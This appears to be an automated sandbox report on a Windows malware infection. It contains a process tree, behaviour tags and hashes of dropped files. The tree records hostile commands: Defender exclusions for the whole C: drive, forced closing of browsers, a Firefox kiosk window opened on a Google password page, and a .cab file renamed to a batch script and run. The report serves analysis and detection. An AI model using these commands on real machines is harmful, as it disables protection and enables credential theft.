                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10427860101\7a76898fa2.exe"
                                                                                                                    3⤵
                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Identifies Wine through registry keys
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:3752
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10427870101\8c3b034fea.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10427870101\8c3b034fea.exe"
                                                                                                                    3⤵
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:4716
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10427880101\36fe42cf07.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10427880101\36fe42cf07.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                    PID:5748
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /F /IM firefox.exe /T
                                                                                                                      4⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Kills process with taskkill
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:6068
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /F /IM chrome.exe /T
                                                                                                                      4⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:4172
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /F /IM msedge.exe /T
                                                                                                                      4⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:1744
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /F /IM opera.exe /T
                                                                                                                      4⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:2768
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /F /IM brave.exe /T
                                                                                                                      4⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:3024
                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                      4⤵
                                                                                                                        PID:1796
                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                          5⤵
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Modifies registry class
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:932
                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1992 -prefsLen 27099 -prefMapHandle 1996 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {aa33ebf0-7657-4784-a86e-b2be6baf88bf} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                                            6⤵
                                                                                                                              PID:4920
                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2416 -initialChannelId {c8db580d-ae05-4b40-893b-cc273ec93f8e} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                                              6⤵
                                                                                                                                PID:2732
                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3876 -prefsLen 25164 -prefMapHandle 3880 -prefMapSize 270279 -jsInitHandle 3884 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3892 -initialChannelId {463bd256-9362-4c40-9365-ddde4a38e197} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                                                6⤵
                                                                                                                                • Checks processor information in registry
                                                                                                                                PID:4240
                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4036 -prefsLen 27276 -prefMapHandle 4040 -prefMapSize 270279 -ipcHandle 4124 -initialChannelId {745c3378-d237-4582-afaf-1473815bb770} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                                                6⤵
                                                                                                                                  PID:5300
                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3296 -prefsLen 34775 -prefMapHandle 2780 -prefMapSize 270279 -jsInitHandle 2956 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4632 -initialChannelId {422c3471-a33e-4f14-931d-2a77327aecb0} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                                                  6⤵
                                                                                                                                    PID:5340
                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5188 -prefsLen 34905 -prefMapHandle 5192 -prefMapSize 270279 -ipcHandle 5204 -initialChannelId {7a7eb2e6-d771-4419-9d98-4302ff193c9f} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                                                    6⤵
                                                                                                                                      PID:6464
                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5428 -prefsLen 32952 -prefMapHandle 5432 -prefMapSize 270279 -jsInitHandle 5436 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5444 -initialChannelId {2f772fdd-0e65-415b-8a92-401eb39d3511} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                                                      6⤵
                                                                                                                                        PID:6728
                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5640 -prefsLen 32952 -prefMapHandle 5644 -prefMapSize 270279 -jsInitHandle 5648 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5472 -initialChannelId {8100d9c8-c93d-469a-b30d-7de82396855c} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                                                        6⤵
                                                                                                                                          PID:6740
                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5804 -prefsLen 32952 -prefMapHandle 5808 -prefMapSize 270279 -jsInitHandle 5812 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5820 -initialChannelId {333890e9-a60a-4649-b943-8466336fbd62} -parentPid 932 -crashReporter "\\.\pipe\gecko-crash-server-pipe.932" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                                          6⤵
                                                                                                                                            PID:6776
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10427890101\a81cd96533.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10427890101\a81cd96533.exe"
                                                                                                                                      3⤵
                                                                                                                                        PID:7164
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10427900101\4WMUMmx.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10427900101\4WMUMmx.exe"
                                                                                                                                        3⤵
                                                                                                                                          PID:6324
                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                            4⤵
                                                                                                                                              PID:1648
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 1424
                                                                                                                                                5⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:17236
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10427910101\TbV75ZR.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10427910101\TbV75ZR.exe"
                                                                                                                                            3⤵
                                                                                                                                              PID:6240
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                4⤵
                                                                                                                                                  PID:5320
                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:6332
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2876
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 488
                                                                                                                                                        5⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:16964
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10427920101\dojG16n.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10427920101\dojG16n.exe"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:17032
                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:17064
                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:17076
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10427930101\7IIl2eE.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10427930101\7IIl2eE.exe"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:12384
                                                                                                                                                            • C:\Windows\SysWOW64\CMD.exe
                                                                                                                                                              "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                                                                                                              4⤵
                                                                                                                                                                PID:12604
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10427940101\UZPt0hR.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10427940101\UZPt0hR.exe"
                                                                                                                                                              3⤵
                                                                                                                                                                PID:6148
                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                  cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:18328
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:18492
                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                    "C:\Windows\system32\svchost.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:17328
                                                                                                                                                                      • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                                                                                                        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:20356
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell Add-MpPreference -ExclusionPath C:\
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:23912
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell Remove-MpPreference -ExclusionPath C:\
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:23136
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:20392
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10427960101\20273858a2.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10427960101\20273858a2.exe"
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:18708
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10427990101\PJ7KEk9.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10427990101\PJ7KEk9.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:22360
                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:23616
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10428001121\izP7K34.cmd"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:12124
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10428001121\izP7K34.cmd"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:23200
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10428010101\e5c64e905f.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10428010101\e5c64e905f.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:18008
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1432 -ip 1432
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:3732
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    PID:3156
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:64
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:2632
                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:3784
                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3520
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:7020
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\kygn3IrghHrrRx5N.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:5152
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\kygn3IrghHrrRx5N.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\kygn3IrghHrrRx5N.exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:6040
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1VHQTNqs\UmJJKKXOxnV1qFuV.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1VHQTNqs\UmJJKKXOxnV1qFuV.exe 6040
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:1044
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1232
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:18388
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\D8Evwh4aZQkHnyZG.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\cZ4GbG3r\D8Evwh4aZQkHnyZG.exe 6040
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:21896
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 21896 -s 576
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:7196
                                                                                                                                                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                    "C:\Windows\System32\svchost.exe"
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:12176
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1372 -ip 1372
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:12188
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2876 -ip 2876
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:12208
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1648 -ip 1648
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:17196
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:12672
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:12688
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1044 -ip 1044
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:18320
                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:18316
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:12908
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 20384 -ip 20384
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:7660
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 21896 -ip 21896
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:20320

                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                        • C:\ProgramData\5xtr16xtri.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.9MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          7b545a4a0f8febad62cff17b5b8f326f

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          81cbbd98a6282ff3ab0400e4f6b82ce549401873

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          585392ec23db6d24697c38aec92e87985a418587d55f6b8b4467d12423205e36

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          7a0d4e6fc018256cdbe063351d0c9ba8cbe891eb7dbe1da18cad84ad7b6a273d704842b35d8fa8c1eab4ea9f4c8bfaf0447b5a5a03128e50b55bbdeb85b7bee4

                                                                                                                                                                                                                        • C:\ProgramData\8y58gl689h.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          251KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          58d3a0d574e37dc90b40603f0658abd2

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          bf5419ce7000113002b8112ace2a9ac35d0dc557

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          dcc05c3ac7ae22d601bcb7c97cfcda568f3041bd39b2fd8899282dfde83369a5

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          df61329a32e9261b01c5b7d95e0d9a3fb8cc36e5d90ede72bc16befe00fb32c221898a8346db9de07c0f5dcba57dcdbb09a22ca8b73223f989d33ec433c3a90a

                                                                                                                                                                                                                        • C:\ProgramData\PgAwALjbKqwB

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          96KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          6066c07e98c96795ecd876aa92fe10f8

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          f73cbd7b307c53aaae38677d6513b1baa729ac9f

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          33a2357af8dc03cc22d2b7ce5c90abf25ac8b40223155a516f1a8df4acbf2a53

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          7d76207c1c6334aa98f79c325118adf03a5ba36b1e2412803fd3e654a9d3630c775f32a98855c46342eba00d4a8496a3ded3686e74beaac9c216beee37aa5cb7

                                                                                                                                                                                                                        • C:\ProgramData\h47ymoppph.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          bee9603b0659ec222790915baf8793f9

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          f62a981a0c35ab65692fe4a4e25da3fa918bee0d

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          a2895294d3ba0fa269b98c2c7e5959a7649d37da9de204ba3c9bb8b6adef5be9

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          7860f61932117fc7c13d43dc4d7fa6e9f5e88bb65c68d82e32cf87ca258f7538b1250dabce83d49088c5f1cae0d61ab2d3a506629e511446308e68b595310bfc

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\D34jWyWW7rN9.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          162B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          1b7c22a214949975556626d7217e9a39

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          d01c97e2944166ed23e47e4a62ff471ab8fa031f

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          649B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          261aca86baade66942e6f9e5ec84ec9b

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          71c12abd700ceb6c66d0539052e308bc68eae5fb

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          5a6a537311e0f97dd2cb6f9e23535f900b041ba1fafc540b3d37d412a216b981

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          3c9b665e7947157a9096fd97a06d3e1b51196d29452e646ac7bd5c5ff7037904f5d31c5857d848bc5ac7eeb761f53e8b4633565d193b626a5bdebe64b40e75cc

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          d751713988987e9331980363e24189ce

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          79KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          b2e55a7104f64e263720eb9956253f7f

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          d60160f0b974a3e178cdfee2347a4ae7342d02ac

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          7df8bc6737439a0b87a366982866e155cbf5fd941e36f2e682ad636ff2177ffd

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          10d6896ab163cb031723419ba2c958d44c907a6b80ac01cadaee62e538e8fc507a4fba733bc074cfddbfd19dc832540bf43d206116e1eaba9c58197a28b86165

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                          MD5

